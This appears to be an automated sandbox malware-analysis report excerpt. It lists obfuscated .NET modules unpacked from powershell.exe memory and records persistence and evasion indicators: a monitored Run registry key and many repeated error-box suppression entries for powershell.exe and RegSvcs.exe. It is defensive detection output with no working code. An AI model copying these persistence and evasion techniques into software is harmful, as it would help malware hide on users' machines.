Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs High entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.cs High entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.cs High entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs High entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.cs High entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.cs High entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs High entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs High entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs High entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'

Boot Survival

barindex
Source: C:\Windows\System32\conhost.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
